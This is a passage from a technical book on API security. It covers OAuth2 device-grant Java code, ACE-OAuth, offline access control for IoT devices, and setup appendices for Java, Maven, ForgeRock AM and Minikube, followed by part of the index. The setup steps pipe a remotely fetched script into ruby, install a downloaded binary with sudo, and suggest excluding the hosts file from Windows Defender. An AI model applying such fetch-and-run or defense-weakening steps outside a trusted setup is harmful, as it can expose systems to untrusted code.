"&grant_type=urn:ietf:params:oauth:grant-type:device_code" +
"&device_code=" + URLEncoder.encode(deviceCode, UTF_8);
var request = HttpRequest.newBuilder()
.header("Content-Type",
"application/x-www-form-urlencoded")
.uri(URI.create("https://as.example.com/access_token"))
.POST(BodyPublishers.ofString(form))
.build();
var response = httpClient.send(request, BodyHandlers.ofString());
return new JSONObject(response.body());
}
Listing 13.17
Checking status of the authorization request
Figure 13.8
A QR code is a way to encode a URI
that can be easily scanned by a mobile phone with a
camera. This can be used to display the verification
URI used in the OAuth2 device authorization grant. If
you scan this QR code on your phone, it will take you
to the home page for this book.
Encode the
client ID and
device code
along with the
device_code
grant type URI.
Post the
parameters
to the
access token
endpoint at
the AS.
Parse the response
as JSON.
516
CHAPTER 13
Securing IoT APIs
If the user has already approved the request, then the AS will return an access token,
optional refresh token, and other details as it does for other access token requests you
learned about in chapter 7. Otherwise, the AS returns one of the following status codes:
authorization_pending indicates that the user hasn’t yet approved or denied
the request and the device should try again later.
slow_down indicates that the device is polling the authorization endpoint too
frequently and should increase the interval between requests by 5 seconds. An
AS may revoke authorization if the device ignores this code and continues to
poll too frequently.
access_denied indicates that the user refused the request.
expired_token indicates that the device code has expired without the request
being approved or denied. The device will have to initiate a new flow to obtain a
new device code and user code.
Listing 13.18 shows how to handle the full authorization flow in the client building on
the previous methods. Open the DeviceGrantClient.java file again and add the main
method from the listing.
TIP
If you want to test the client, the ForgeRock Access Management (AM)
product supports the device authorization grant. Follow the instructions in
appendix A to set up the server and then the instructions in http://mng.bz/
X0W6 to configure the device authorization grant. AM implements an older
draft version of the standard and requires an extra response_type=device
_code parameter on the initial request to begin the flow.
public static void main(String... args) throws Exception {
var clientId = "deviceGrantTest";
var scope = "a b c";
var json = beginDeviceAuthorization(clientId, scope);
var deviceCode = json.getString("device_code");
var interval = json.optInt("interval", 5);
System.out.println("Please open " +
json.getString("verification_uri"));
System.out.println("And enter code:\n\t" +
json.getString("user_code"));
while (true) {
Thread.sleep(TimeUnit.SECONDS.toMillis(interval));
json = pollAccessTokenEndpoint(clientId, deviceCode);
var error = json.optString("error", null);
if (error != null) {
switch (error) {
case "slow_down":
System.out.println("Slowing down");
interval += 5;
break;
Listing 13.18
The full device authorization grant flow
Start the
authorization
process and store
the device code
and poll interval.
Display the
verification URI and
user code to the user.
Poll the
access token
endpoint
with the
device code
according to
the poll
interval.
If the AS tells you
to slow down,
then increase the
poll interval by
5 seconds.
517
OAuth2 for constrained environments
case "authorization_pending":
System.out.println("Still waiting!");
break;
default:
System.err.println("Authorization failed: " + error);
System.exit(1);
break;
}
} else {
System.out.println("Access token: " +
json.getString("access_token"));
break;
}
}
}
13.3.2 ACE-OAuth
The Authorization for Constrained Environments (ACE) working group at the IETF is
working to adapt OAuth2 for IoT applications. The main output of this group is the
definition of the ACE-OAuth framework (http://mng.bz/yr4q), which describes how
to perform OAuth2 authorization requests over CoAP instead of HTTP and using
CBOR instead of JSON for requests and responses. COSE is used as a standard format
for access tokens and can also be used as a proof of possession (PoP) scheme to secure
tokens against theft (see section 11.4.6 for a discussion of PoP tokens). COSE can also
be used to protect API requests and responses themselves, using the OSCORE frame-
work you saw in section 13.1.4.
At the time of writing, the ACE-OAuth specifications are still under development
but are approaching publication as standards. The main framework describes how to
adapt OAuth2 requests and responses to use CBOR, including support for the autho-
rization code, client credentials, and refresh token grants.3 The token introspection
endpoint is also supported, using CBOR over CoAP, providing a standard way for
resource servers to check the status of an access token.
Unlike the original OAuth2, which used bearer tokens exclusively and has only
recently started supporting proof-of-possession (PoP) tokens, ACE-OAuth has been
designed around PoP from the start. Issued access tokens are bound to a cryptographic
key and can only be used by a client that can prove possession of this key. This can be
accomplished with either symmetric or public key cryptography, providing support for
a wide range of device capabilities. APIs can discover the key associated with a device
either through token introspection or by examining the access token itself, which is
typically in CWT format. When public key cryptography is used, the token will contain
the public key of the client, while for symmetric key cryptography, the secret key will
be present in COSE-encrypted form, as described in RFC 8747 (https://datatracker
.ietf.org/doc/html/rfc8747).
3 Strangely, the device authorization grant is not yet supported.
Otherwise,
keep waiting
until a response
is received.
The AS will return an
access token when
the authorization
is complete.
518
CHAPTER 13
Securing IoT APIs
13.4
Offline access control
Many IoT applications involve devices operating in environments where they may not
have a permanent or reliable connection to central authorization services. For exam-
ple, a connected car may be driven through long tunnels or to remote locations where
there is no signal. Other devices may have limited battery power and so want to avoid
making frequent network requests. It’s usually not acceptable for a device to com-
pletely stop functioning in this case, so you need a way to perform security checks
while the device is disconnected. This is known as offline authorization. Offline authori-
zation allows devices to continue accepting and producing API requests to other local
devices and users until the connection is restored.
DEFINITION
Offline authorization allows a device to make local security deci-
sions when it is disconnected from a central authorization server.
Allowing offline authorization often comes with increased risks. For example, if a
device can’t check with an OAuth2 authorization server whether an access token is
valid, then it may accept a token that has been revoked. This risk must be balanced
against the costs of downtime if devices are offline and the appropriate level of risk
determined for your application. You may want to apply limits to what operations can
be performed in offline mode or enforce a time limit for how long devices will oper-
ate in a disconnected state.
13.4.1 Offline user authentication
Some devices may never need to interact with a user at all, but for some IoT applica-
tions this is a primary concern. For example, many companies now operate smart
lockers where goods ordered online can be delivered for later collection. The user
arrives at a later time and uses an app on their smartphone to send a request to open
the locker. Devices used in industrial IoT deployments may work autonomously most
of the time, but occasionally need servicing by a human technician. It would be frus-
trating for the user if they couldn’t get their latest purchase because the locker can’t
connect to a cloud service to authenticate them, and a technician is often only
involved when something has gone wrong, so you shouldn’t assume that network ser-
vices will be available in this situation.
The solution is to make user credentials available to the device so that it can locally
authenticate the user. This doesn’t mean that the user’s password hash should be
transmitted to the device, because this would be very dangerous: an attacker that
intercepted the hash could perform an offline dictionary attack to try to recover the
password. Even worse, if the attacker compromised the device, then they could just
intercept the password directly as the user types it. Instead, the credential should be
short-lived and limited to just the operations needed to access that device. For exam-
ple, a user can be sent a one-time code that they can display on their smartphone as a
QR code that the smart locker can scan. The same code is hashed and sent to the
519
Offline access control
device, which can then compare the hash to the QR code and if they match, it opens
the locker, as shown in figure 13.9.
For this approach to work, the device must be online periodically to download new
credentials. A signed, self-contained token format can overcome this problem. Before
leaving to service a device in the field, the technician can authenticate to a central
authorization server and receive an OAuth2 access token or OpenID Connect ID
token. This token can include a public key or a temporary credential that can be used
to locally authenticate the user. For example, the token can be bound to a TLS client
certificate as described in chapter 11, or to a key using CWT PoP tokens mentioned in
section 13.3.2. When the technician arrives to service the device, they can present
the access token to access device APIs over a local connection, such as Bluetooth
Secure locker
Locker 1
Locker 2
Cloud retailer
One-time code
SHA-256(one-time code)
Locker 1
QR code
scanner
When the user orders
goods for collection, they
are given a one-time code.
A secure hash of the
code and details of the
delivery are transmitted
to the locker.
The user’s phone
displays the code
as a QR code that is
scanned by the locker.
If the code matches
the hash, then the locker
is unlocked and the
code deleted.
Figure 13.9
One-time codes can be periodically sent to an IoT device such as a
secure locker. A secure hash of the code is stored locally, allowing the locker to
authenticate users even if it cannot contact the cloud service at that time.
520
CHAPTER 13
Securing IoT APIs
Low-Energy (BLE). The device API can verify the signature on the access token and
check the scope, issuer, audience, expiry time, and other details. If the token is valid,
then the embedded credentials can be used to authenticate the user locally to allow
access according to the conditions attached to the token.
13.4.2 Offline authorization
Offline authentication solves the problem of identifying users without a direct con-
nection to a central authentication service. In many cases, device access control
decisions are simple enough to be hard-coded based on pre-existing trust relation-
ships. For example, a device may allow full access to any user that has a credential
issued by a trusted source and deny access to everybody else. But not all access con-
trol policies are so simple, and access may depend on a range of dynamic factors and
changing conditions. Updating complex policies for individual devices becomes diffi-
cult as the number of devices grows. As you learned in chapter 8, access control poli-
cies can be centralized using a policy engine that is accessed via its own API. This
simplifies management of device policies, but again can lead to problems if the device
is offline.
The solutions are similar to the solutions to offline authentication described in the
last section. The most basic solution is for the device to periodically download the lat-
est policies in a standard format such as XACML, discussed in chapter 8. The device
can then make local access control decisions according to the policies. XACML is a
complex XML-based format, so you may want to consider a more lightweight policy
language encoded in CBOR or another compact format, but I am not aware of any
standards for such a language.
Self-contained access token formats can also be used to permit offline authoriza-
tion. A simple example is the scope included in an access token, which allows an
offline device to determine which API operations a client should be allowed to call.
More complex conditions can be encoded as caveats using a macaroon token format,
discussed in chapter 9. Suppose that you used your smartphone to book a rental car.
An access token in macaroon format is sent to your phone, allowing you to unlock the
car by transmitting the token to the car over BLE just like in the example at the end of
section 13.4.1. You later drive the car to an evening event at a luxury hotel in a
secluded location with no cellular network coverage. The hotel offers valet parking,
but you don’t trust the attendant, so you only want to allow them limited ability to
drive the expensive car you hired. Because your access token is a macaroon, you can
simply append caveats to it restricting the token to expire in 10 minutes and only
allow the car to be driven in a quarter-mile radius of the hotel.
Macaroons are a great solution for offline authorization because caveats can be
added by devices at any time without any coordination and can then be locally verified
by devices without needing to contact a central service. Third-party caveats can also
work well in an IoT application, because they require the client to obtain proof of
authorization from the third-party API. This authorization can be obtained ahead
521
Summary
of time by the client and then verified by the device by checking the discharge maca-
roon, without needing to directly contact the third party.
Answers to pop quiz questions
1
False. The PSK can be any sequence of bytes and may not be a valid string.
2
d. the ID is authenticated during the handshake so you should only trust it after
the handshake completes.
3
d. Entity authentication requires that messages are fresh and haven’t been
replayed.
4
b, c, and d.
5
a.
6
c. The device authorization grant.
Summary
Devices can be identified using credentials associated with a device profile.
These credentials could be an encrypted pre-shared key or a certificate contain-
ing a public key for the device.
Device authentication can be done at the transport layer, using facilities in TLS,
DTLS, or other secure protocols. If there is no end-to-end secure connection,
then you’ll need to implement your own authentication protocol.
End-to-end device authentication must ensure freshness to prevent replay attacks.
Freshness can be achieved with timestamps, nonces, or challenge-response pro-
tocols. Preventing replay requires storing per-device state, such as a monotoni-
cally increasing counter or recently used nonces.
REST APIs can prevent replay by making use of authenticated request objects
that contain an ETag that identifies a specific version of the resource being
acted on. The ETag should change whenever the resource changes to prevent
replay of previous requests.
The OAuth2 device grant can be used by devices with no input capability to
obtain access tokens authorized by a user. The ACE-OAuth working group at
Pop quiz
6
Which OAuth authorization grant can be used on devices that lack user input
features?
a
The client credentials grant
b
The authorization code grant
c
The device authorization grant
d
The resource owner password grant
The answer is at the end of the chapter.
522
CHAPTER 13
Securing IoT APIs
the IETF is developing specifications that adapt OAuth2 for use in constrained
environments.
Devices may not always be able to connect to central cloud services. Offline
authentication and access control allow devices to continue to operate securely
when disconnected. Self-contained token formats can include credentials and
policies to ensure authority isn’t exceeded, and proof-of-possession (PoP) con-
straints can be used to provide stronger security guarantees.
523
appendix A
Setting up Java
and Maven
The source code examples in this book require several prerequisites to be installed
and configured before they can be run. This appendix describes how to install and
configure those prerequisites. The following software is required:
■
Java 11
■
Maven 3
A.1
Java and Maven
A.1.1
macOS
On macOS, the simplest way to install the pre-requisites is using Homebrew (https://
brew.sh). Homebrew is a package manager that simplifies installing other software
on macOS. To install Homebrew, open a Terminal window (Finder > Applications >
Utilities > Terminal) and type the following command:
/usr/bin/ruby -e "$(curl -fsSL
➥ https://raw.githubusercontent.com/Homebrew/install/master/install)"
This script will guide you through the remaining steps to install Homebrew. If
you don’t want to use Homebrew, all the prerequisites can be manually installed
instead.
INSTALLING JAVA 11
If you have installed Homebrew, then the latest Java can be installed with the fol-
lowing simple command:
brew cask install adoptopenjdk
524
APPENDIX A
Setting up Java and Maven
TIP
Some Homebrew packages are marked as casks, which means that they
are binary-only native applications rather than installed from source code.
In most cases, this just means that you use brew cask install rather than brew
install.
The latest version of Java should work with the examples in this book, but you can tell
Homebrew to install version 11 by running the following commands:
brew tap adoptopenjdk/openjdk
brew cask install adoptopenjdk11
This will install the free AdoptOpenJDK distribution of Java into /Library/Java/Java-
VirtualMachines/adoptopenjdk-11.0.6.jdk. If you did not install Homebrew, then
binary installers can be downloaded from https://adoptopenjdk.net.
Once Java 11 is installed, you can ensure that it is used by running the following
command in your Terminal window:
export JAVA_HOME=$(/usr/libexec/java_home -v11)
This instructs Java to use the OpenJDK commands and libraries that you just installed.
To check that Java is installed correctly, run the following command:
java -version
You should see output similar to the following:
openjdk version "11.0.6" 2018-10-16
OpenJDK Runtime Environment AdoptOpenJDK (build 11.0.1+13)
OpenJDK 64-Bit Server VM AdoptOpenJDK (build 11.0.1+13, mixed mode)
INSTALLING MAVEN
Maven can be installed from Homebrew using the following command:
brew install maven
Alternatively, Maven can be manually installed from https://maven.apache.org. To
check that you have Maven installed correctly, type the following at a Terminal window:
mvn -version
The output should look like the following:
Apache Maven 3.5.4 (1edded0938998edf8bf061f1ceb3cfdeccf443fe; 2018-06-
17T19:33:14+01:00)
Maven home: /usr/local/Cellar/maven/3.5.4/libexec
Java version: 11.0.1, vendor: AdoptOpenJDK, runtime: /Library/Java/
JavaVirtualMachines/adoptopenjdk-11.0.1.jdk/Contents/Home
Default locale: en_GB, platform encoding: UTF-8
OS name: "mac os x", version: "10.14.2", arch: "x86_64", family: "mac"
525
Installing an Authorization Server
A.1.2
Windows
On Windows 10, you can install the dependencies using Homebrew using the Win-
dows Subsystem for Linux (WSL). To install WSL, go to https://docs.microsoft.com/
en-us/windows/wsl/about and follow the instructions. You can then follow the
instructions for installing Homebrew for Linux in section A.1.3.
A.1.3
Linux
On a Linux system, you can either install the dependencies using your distribution’s
package manager, or you can install Homebrew and follow the same instructions for
macOS to install Java and Maven. To install Homebrew on Linux, follow the instruc-
tions at https://docs.brew.sh/Homebrew-on-Linux.
A.2
Installing Docker
Docker (https://www.docker.com) is a platform for building and running Linux con-
tainers. Some of the software used in the examples is packaged using Docker, and the
Kubernetes examples in chapters 10 and 11 require a Docker installation.
Although Docker can be installed through Homebrew and other package managers,
the Docker Desktop installation tends to work better and is easier to use. You can down-
load the installer for each platform from the Docker website or using the following links:
■
Windows: http://mng.bz/qNYA
■
MacOS: https://download.docker.com/mac/stable/Docker.dmg
■
Linux installers can be found under https://download.docker.com/linux/
static/stable/
After downloading the installer for your platform, run the file and follow the instruc-
tions to install Docker Desktop.
A.3
Installing an Authorization Server
For the examples in chapter 7 and later chapters, you’ll need a working OAuth2
Authorization Server (AS). There are many commercial and open source AS imple-
mentations to choose from. Some of the later chapters use cutting-edge features that
are currently only implemented in commercial AS implementations. I’ve therefore
provided instructions for installing an evaluation copy of a commercial AS, but you
could also use an open source alternative for many of the examples, such as MITREid
Connect (http://mng.bz/7Gym).
A.3.1
Installing ForgeRock Access Management
ForgeRock Access Management (https://www.forgerock.com) is a commercial AS
(and a lot more besides) that implements a wide variety of OAuth2 features.
NOTE
The ForgeRock software is provided for evaluation purposes only.
You’ll need a commercial license to use it in production. See the ForgeRock
website for details.
526
APPENDIX A
Setting up Java and Maven
SETTING UP A HOST ALIAS
Before running AM, you should add an entry into your hosts file to create an alias
hostname for it to run under. On MacOS and Linux you can do this by editing the
/etc/hosts file, for example, by running:
sudo vi /etc/hosts
TIP
If you’re not familiar with vi use your editor of choice. Hit the Escape
key and then type :q! and hit Return to exit vi if you get stuck.
Add the following line to the /etc/hosts file and save the changes:
127.0.0.1 as.example.com
There must be at least two spaces between the IP address and the hostname.
On Windows, the file is in C:\Windows\System32\Drivers\etc\hosts. You can create
the file if it doesn’t already exist. Use Notepad or another plain text editor to edit the
hosts file.
WARNING
Windows 8 and later versions may revert any changes you make to
the hosts file to protect against malware. Follow the instructions on this site to
exclude the hosts file from Windows Defender: http://mng.bz/mNOP.
RUNNING THE EVALUATION VERSION
Once the host alias is set up, you can run the evaluation version of ForgeRock Access
Management (AM) by running the following Docker command:
docker run -i -p 8080:8080 -p 50389:50389 \
-t gcr.io/forgerock-io/openam:6.5.2
This will download and run a copy of AM 6.5.2 in a Tomcat servlet environment inside
a Docker container and make it available to access over HTTP on the local port 8080.
TIP
The storage for this image is non-persistent and will be deleted when
you shut it down. Any configuration changes you make will not be saved.
Once the download and startup are complete, it will display a lot of console output
finishing with a line like the following:
10-Feb-2020 21:40:37.320 INFO [main]
➥ org.apache.catalina.startup.Catalina.start Server startup in
➥ 30029 ms
You can now continue the installation by navigating to http:/ /as.example.com:8080/
in a web browser. You will see an installation screen as in figure A.1. Click on the link
to Create Default Configuration to begin the install.
You’ll then be asked to accept the license agreement, so scroll down and tick the
box to accept and click continue. The final step in the installation is to pick an admin-
istrator password. Because this is just a demo environment on your local machine,
527
Installing an Authorization Server
choose any value you like that is at least eight characters long. Make a note of the pass-
word you’ve chosen. Type the password into both boxes and then click Create Config-
uration to finalize the installation. This may take a few minutes as it installs the
components of the server into the Docker image.
After the installation has completed, click on the link to Proceed to Login and
then enter the password you chose during the installer with the username amadmin.
You’ll end up in the AM admin console, shown in figure A.2. Click on the Top Level
Realms box to get to the main dashboard page, shown in figure A.3.
On the main dashboard, you can configure OAuth2 support by clicking on the
Configure OAuth Provider button, as shown in figure A.3. This will then give you the
option to configure OAuth2 for various use cases. Click Configure OpenID Connect
and then click the Create button in the top right-hand side of the screen.
After you’ve configured OAuth2 support, you can use curl to query the OAuth2
configuration document by opening a new terminal window and running:
curl http://as.example.com:8080/oauth2/.well-known/
➥ openid-configuration | jq
TIP
If you don’t have curl or jq installed already, you can install them by run-
ning brew install curl jq on Mac or apt-get install curl jq on Linux. On
Windows, they can be downloaded from https://curl.haxx.se and https://
stedolan.github.io/jq/.
Figure A.1
The ForgeRock AM installation screen. Click on the link to Create Default Configuration.
528
APPENDIX A
Setting up Java and Maven
Figure A.2
The AM admin console home screen. Click the Top Level Realms box.
Click Configure OAuth Provider
to set up OAuth2 support.
OAuth2 clients are
configured under
Applications.
Figure A.3
In the main AM dashboard page, click Configure OAuth Provider to set up OAuth2 support.
Later, you will configure an OAuth2 client under the Applications page in the sidebar.
529
Installing an Authorization Server
The JSON output includes several useful endpoints that you’ll need for the examples
in chapter 7 and later. Table A.1 summarizes the relevant values from the configura-
tion. See chapter 7 for a description of these endpoints.
To register an OAuth2 client, click on Applications in the left-hand sidebar, then
OAuth2, and then Clients. Click the New Client button and you’ll see the form for
basic client details shown in figure A.4. Give the client the ID “test” and a client secret.
You can choose a weak client secret for development purposes; I use “password.”
Finally, you can configure some scopes that the client is permitted to ask for.
TIP
By default, AM only supports the basic OpenID Connect scopes: openid,
profile, email, address, and phone. You can add new scopes by clicking on
Table A.1
ForgeRock AM OAuth2 endpoints
Endpoint name
URI
Token endpoint
http:/ /as.example.com:8080/oauth2/access_token
Introspection endpoint
http:/ /as.example.com:8080/oauth2/introspect
Authorization endpoint
http:/ /as.example.com:8080/oauth2/authorize
UserInfo endpoint
http:/ /as.example.com:8080/oauth2/userinfo
JWK Set URI
http:/ /as.example.com:8080/oauth2/connect/jwk_uri
Dynamic client registration endpoint
http:/ /as.example.com:8080/oauth2/register
Revocation endpoint
http:/ /as.example.com:8080/oauth2/token/revoke
Figure A.4
Adding a new client. Give the client a name and a client secret. Add some permitted scopes. Finally,
click the Create button to create the client.
530
APPENDIX A
Setting up Java and Maven
Services in the left-hand sidebar, then OAuth2 Provider. Then click on the
Advanced tab and add the scopes to the Supported Scopes field and click
Save Changes. The scopes that are used in the examples in this book are
create_space, post_message, read_message, list_messages, delete_message,
and add_member.
After you’ve created the client, you’ll be taken to the advanced client properties page.
There are a lot of properties! You don’t need to worry about most of them, but you
should allow the client to use all the authorization grant types covered in this book.
Click on the Advanced tab at the top of the page, and then click inside the Grant
Types field on the page as shown in figure A.5. Add the following grant types to the
field and then click Save Changes:
■
Authorization Code
■
Resource Owner Password Credentials
■
Client Credentials
■
Refresh Token
■
JWT Bearer
■
Device Code
Figure A.5
Click on the Advanced tab and then in the Grant Types field to configure the allowed grant
types for the client.
531
Installing an LDAP directory server
You can check that everything is working by getting an access token for the client by
running the following curl command in a terminal:
curl -d 'grant_type=client_credentials&scope=openid' \
-u test:password http://as.example.com:8080/oauth2/access_token
You’ll see output like the following:
{"access_token":"MmZl6jRhMoZn8ZNOXUAa9RPikL8","scope":"openid","id_token":"ey
J0eXAiOiJKV1QiLCJraWQiOiJ3VTNpZklJYUxPVUFSZVJCL0ZHNmVNMVAxUU09IiwiYWxnIjoiUlM
yNTYifQ.eyJhdF9oYXNoIjoiTXF2SDY1NngyU0wzc2dnT25yZmNkZyIsInN1YiI6InRlc3QiLCJhd
WRpdFRyYWNraW5nSWQiOiIxNDViNjI2MC1lNzA2LTRkNDctYWVmYy1lMDIzMTQyZjBjNjMtMzg2MT
kiLCJpc3MiOiJodHRwOi8vYXMuZXhhbXBsZS5jb206ODA4MC9vYXV0aDIiLCJ0b2tlbk5hbWUiOiJ
pZF90b2tlbiIsImF1ZCI6InRlc3QiLCJhenAiOiJ0ZXN0IiwiYXV0aF90aW1lIjoxNTgxMzc1MzI1
LCJyZWFsbSI6Ii8iLCJleHAiOjE1ODEzNzg5MjYsInRva2VuVHlwZSI6IkpXVFRva2VuIiwiaWF0I
joxNTgxMzc1MzI2fQ.S5Ib5Acj5hZ7se9KvtlF2vpByG_0XAWKSg0-
Zy_GZmpatrox0460u5HYvPdOVl7qqP-
AtTV1ah_2aFzX1qN99ituo8fOBIpKDTyEgHZcxeZQDskss1QO8ZjdoE-JwHmzFzIXMU-5u9ndfX7-
-Wu_QiuzB45_NsMi72ps9EP8iOMGVAQyjFG5U6jO7jEWHUKI87wrv1iLjaFUcG0H8YhUIIPymk-
CJUgwtCBzESQ1R7Sf-6mpVgAjHA-eQXGjH18tw1dRneq-kY-D1KU0wxMnw0GwBDK-
LudtCBaETiH5T_CguDyRJJotAq65_MNCh0mhsw4VgsvAX5Rx30FQijXjNw","token_type":"Bea
rer","expires_in":3599}
A.4
Installing an LDAP directory server
An LDAP directory server is needed for some of the examples in chapter 8.
TIP
Apache Directory Studio is a useful tool for browsing LDAP directories.
It can be downloaded from https://directory.apache.org/studio/.
A.4.1
ForgeRock Directory Services
If you’ve installed ForgeRock AM using the instructions in section A.3.1, you already
have an LDAP directory server running on port 50389, because this is what AM uses as
its internal database and user repository. You can connect to the directory using the
following details:
■
URL: ldap:/ /localhost:50389/
■
Bind DN: cn=Directory Manager
■
Bind password: the admin password you specified when installing AM
532
appendix B
Setting up Kubernetes
The example code in chapters 10 and 11 requires a working Kubernetes installa-
tion. In this appendix, you’ll find instructions on installing a Kubernetes develop-
ment environment on your own laptop or desktop.
B.1
MacOS
Although Docker Desktop for Mac comes with a functioning Kubernetes environ-
ment, the examples in the book have only been tested with Minikube running on
VirtualBox, so I recommend you install these components to ensure compatibility.
NOTE
The instructions in this appendix assume you have installed Home-
brew. Follow the instructions in appendix A to configure Homebrew before
continuing.
The instructions require MacOS 10.12 (Sierra) or later.
B.1.1
VirtualBox
Kubernetes uses Linux containers as the units of execution on a cluster, so for other
operating systems, you’ll need to install a virtual machine that will be used to run a
Linux guest environment. The examples have been tested with Oracle’s VirtualBox
(https://www.virtualbox.org), which is a freely available virtual machine that runs
on MacOS.
NOTE
Although the base VirtualBox package is open source under the
terms of the GPL, the VirtualBox Extension Pack uses different licensing
terms. See https://www.virtualbox.org/wiki/Licensing_FAQ for details.
None of the examples in the book require the extension pack.
533
Linux
You can install VirtualBox either by downloading an installer from the VirtualBox
website, or by using Homebrew by running:
brew cask install virtualbox
NOTE
After installing VirtualBox you may need to manually approve the
installation of the kernel extension it requires to run. Follow the instructions
on Apple’s website: http://mng.bz/5pQz.
B.1.2
Minikube
After VirtualBox is installed you can install a Kubernetes distribution. Minikube
(https://minikube.sigs.k8s.io/docs/) is a single-node Kubernetes cluster that you can
run on a developer machine. You can install Minikube using Homebrew by running:
brew install minikube
Afterward, you should configure Minikube to use VirtualBox as its virtual machine by
running the following command:
minikube config set vm-driver virtualbox
You can then start minikube by running
minikube start \
--kubernetes-version=1.16.2 \
--memory=4096
TIP
A running Minikube cluster can use a lot of power and memory. Stop
Minikube when you’re not using it by running minikube stop.
Installing Minikube with Homebrew will also install the kubectl command-line appli-
cation required to configure a Kubernetes cluster. You can check that it’s installed cor-
rectly by running:
kubectl version --client --short
You should see output like the following:
Client Version: v1.16.3
If kubectl can’t be found, then make sure that /usr/local/bin is in your PATH by
running:
export PATH=$PATH:/usr/local/bin
You should then be able to use kubectl.
B.2
Linux
Although Linux is the native environment for Kubernetes, it’s still recommended to
install Minikube using a virtual machine for maximum compatibility. For testing, I’ve
used VirtualBox on Linux too, so that is the recommended option.
The version of Kubernetes
used in the book
Use 4GB of memory.
534
APPENDIX B
Setting up Kubernetes
B.2.1
VirtualBox
VirtualBox for Linux can be installed by following the instructions for your Linux dis-
tribution at https://www.virtualbox.org/wiki/Linux_Downloads.
B.2.2
Minikube
Minikube can be installed by direct download by running the following command:
curl \
-LO https://storage.googleapis.com/minikube/releases/latest/
➥ minikube-linux-amd64 \
&& sudo install minikube-linux-amd64 /usr/local/bin/minikube
Afterward, you can configure Minikube to use VirtualBox by running:
minikube config set vm-driver=virtualbox
You can then follow the instructions at the end of section B.1.2 to ensure Minikube
and kubectl are correctly installed.
TIP
If you want to install Minikube using your distribution’s package man-
ager, see the instructions at https://minikube.sigs.k8s.io/docs/start and click
on the Linux tab for various distributions.
B.3
Windows
B.3.1
VirtualBox
VirtualBox for Windows can be installed using the installer file from https://www
.virtualbox.org/wiki/Downloads.
B.3.2
Minikube
A Windows installer for Minikube can be downloaded from https://storage.googleapis
.com/minikube/releases/latest/minikube-installer.exe. Follow the on-screen instruc-
tions after downloading and running the installer.
Once Minikube is installed, open a terminal window, and run:
minikube config set vm-driver=virtualbox
to configure Minikube to use VirtualBox.
535
index
A
A128CBC-HS256 method 203
AAA (authentication, authorization, and audit
logging) 22
ABAC (attribute-based access control) 282–293
best practices for 291–293
combining decisions 284
distributed policy enforcement and
XACML 290–291
implementing decisions 285, 288
policy agents and API gateways 289–290
ABACAccessController class 286, 288
Accept header 57
acceptable inputs 50
access control 22–23, 87–97
adding new members to Natter space 94–95
avoiding privilege escalation attacks 95–97
enforcing 92–94
enforcing authentication 89
offline 520–521
sharing capability URIs 317–318
access log 87
Access Management (AM) product,
ForgeRock 516
access tokens 239–258
JWTs 249–256
letting AS decrypt tokens 258
securing HTTPS client configuration 245–247
token introspection 239–244
token revocation 248
Access-Control-Allow-Credentials header 150, 166,
180
Access-Control-Allow-Headers header 150
Access-Control-Allow-Methods header 150
Access-Control-Allow-Origin header 150, 154
Access-Control-Expose-Headers header 150
Access-Control-Max-Age header 150
Access-Control-Request-Headers 148
Access-Control-Request-Method header 148
access_denied status code 516
access_token parameter 301, 303, 306
accountability, audit logging for 82–87
ACE-OAuth (Authorization for Constrained Envi-
ronments using OAuth2) 511–517
ACLs (access control lists) 90–92, 267
acr claim 262
acr_values parameter 262
act claim 431, 433
active field 241
actor_token parameter 432
actor_token_type parameter 432
add_first_party_caveat method 326
addMember method 94–96, 278
add_third_party_caveat method 329
admin role 275
AEAD (authenticated encryption with associated
data) algorithms 202
AES (Advanced Encryption Standard) 196
AES-CCM (Counter with CBC-MAC)
constructor 456
after filter 37
afterAfter() method 37, 54, 59
alg attribute 189
alg header 188–189, 201
algorithm header 188–189
allow lists 50, 210
allowPrivilegeEscalation 347
AM (Access Management) product,
ForgeRock 516
ambient authority 299
amr claim 262
INDEX
536
API gateways 10, 289–290
API keys 384–385
API security 3–26
analogy for 4–6
defined 6–8
elements of 12–18
assets 13–14
environments and threat models 16–18
security goals 14–16
injection attacks 39–47
mitigating SQL injection with
permissions 45–47
preventing 43–45
input validation 47–51
Natter API 27–33
implementation 29
initializing database 32–33
overview 28–29
setting up project 30–31
producing safe output 53–61
exploiting XSS Attacks 54–57
implementing protections 58
preventing XSS 58
REST API 34–35
creating new space 34–35
wiring up endpoints 36–39
secure development 27–61
security areas 8–12
security mechanisms 19–26
access control and authorization 22–23
audit logging 23–24
encryption 20
identification and authentication
21–22
rate-limiting 24–26
styles 7–8
typical deployment 10–12
APIs
internet of things (IoT) 488–496, 522
authenticating devices 489–496
end-to-end authentication 510
OAuth2 for constrained environments
511–517
offline access control 518–521
passing ID tokens to 264–266
apiVersion attribute 345
App class 30
appData buffer 445
application data transmission phase 397
application server 10
application/json 37
Application-layer DoS attacks (layer-7) 65
AppSec (Application security) 8
AppTest class 30
ARP spoofing attack 369
AS (Authorization Server) 386–387, 512
decrypting tokens 258
installing 525–531
assertion parameter 395
assertions 391
assets 13–14
associated data 496
asymmetric cryptography 250
at rest encryption 20
at_hash claim 263
AtomicInteger class 508
attributes, sensitive
encrypting 195–205
protecting 177–180
aud claim 187, 191, 253, 394
audience parameter 432
audit logging 19, 23–24, 82–87
audit logs, defined 6
AuditController interface 114
auditRequestEnd method 84
auditRequestStart method 84
authenticate authenticate() method 404
authenticate() method 269
authenticated encryption 197
AuthenticatedTokenStore interface 207–208, 323
authentication 21–22
defined 19
enforcing 89
factors 21–22
internet of things (IoT) devices for APIs 489–496
device certificates 492
identifying devices 489–492
with TLS connection 492–496
offline user 518–520
to prevent spoofing 70–77
authenticating users 75–77
creating password database 72–74
HTTP Basic authentication 71
registering users in Natter API 74–75
secure password storage with Scrypt 72
token-based 109–115
implementing token-based login 112–115
modern 146–180
token store abstraction 111–112
authentication, authorization, and audit logging
(AAA) 22
authorization 19, 22
authorization code grant 228–238
hardening code exchange with PKCE 236–237
redirect URIs for different types of client
235–236
refresh tokens 237–238
authorization endpoint 228, 529
Authorization for Constrained Environments
using OAuth2 (ACE-OAuth) 511–517
INDEX
537
Authorization header 88, 163
authorization_pending 516
auth_time claim 262
auth-tls-pass-certificate-to-upstream 402
availability 14, 64–69
azp claim 262, 265
B
-b option 125
badRequest method 53
base image 341–342
batch attack 202
BcTlsCrypto 460, 462
Bearer authentication scheme 160–162
bearer token 160
before filter 89
before() method 58, 92, 124, 153, 288, 307
biometric factors 21
BLE (Bluetooth Low-Energy) 440, 520
block cipher 196
blocking URLs 363
blocklist 50, 210
boolean argument 116, 283
botnets 64
BREACH attack 205
brew cask install adoptopenjdk command 523
brew cask install adoptopenjdk11 command 524
